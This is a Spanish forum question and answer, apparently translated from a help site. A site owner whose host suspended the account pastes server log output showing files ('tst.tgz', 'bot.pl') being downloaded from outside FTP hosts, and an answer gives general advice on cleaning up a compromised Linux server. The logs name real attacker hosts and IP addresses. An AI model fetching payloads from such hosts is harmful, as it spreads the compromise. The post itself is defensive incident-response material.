El host de mi sitio deshabilitó mi cuenta después de que excedí mi ancho de banda. Esto fue extraño, ya que el sitio es pequeño. Comencé a buscar en los registros y, aunque estoy acostumbrado a ver intentos de encontrar puntos finales comunes que no tengo, vi un par de cosas que fueron muy preocupantes. Primero:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 77597 100 77597 0 0 184k 0 --:--:-- --:--:-- --:--:-- 246k
--2019-10-13 11:49:21-- ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
=> `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done. ==> RETR tst.tgz ... done.
0K .......... .......... . 53.3K=0.4s
2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]
y
Nunca he visto estas cosas. Creo que de alguna manera me han dominado. ¿Cómo lo soluciono?
curl: (7) couldn't connect to host
curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04-- ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--
ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.
Respuesta1
Parece que su máquina Linux se ha visto comprometida a través del servicio Apache.
¿Cómo lo soluciono?
No existe una solución sencilla, ya que es necesario investigar todo el sistema en busca de posibles violaciones.
Aquí hay algunas sugerencias generales:
- Actualice Apache a su última versión (a través de
apt-get). - Actualice todos sus paquetes (
sudo apt-get update). - Actualice todos sus CMS/frameworks web que estén en uso (verifique si hay vulnerabilidades conocidas).
- Analice todo su sistema en busca de vulnerabilidades existentes (por ejemplo, escáneres de malware, antivirus).
- Escanee todos sus sitios web en busca de malware y archivos de código shell.
Si estás usando PHP:
- Usar unaEscáner de seguridad PHP.
- Usar unaEscáner de malware para sitios web basados en PHP.
- Si utiliza alojamiento compartido, comuníquese con la empresa de alojamiento.
- Verifique su sistema en busca de usuarios adicionales inesperados (
/etc/users) o archivos (por ejemplo, en/tmp). Si ha confirmado la infracción:
- Cambie todas las credenciales expuestas (claves de acceso, contraseñas, etc.).
- Guarde todas las evidencias en caso de que las necesite (direcciones IP, registros, archivos infectados/malware).
- Después de parchear sus sistemas, siga monitoreando sus registros para detectar cualquier actividad sospechosa.
Si no está seguro de lo anterior, comuníquese con la empresa de TI que se especializa en eso.
Ver también: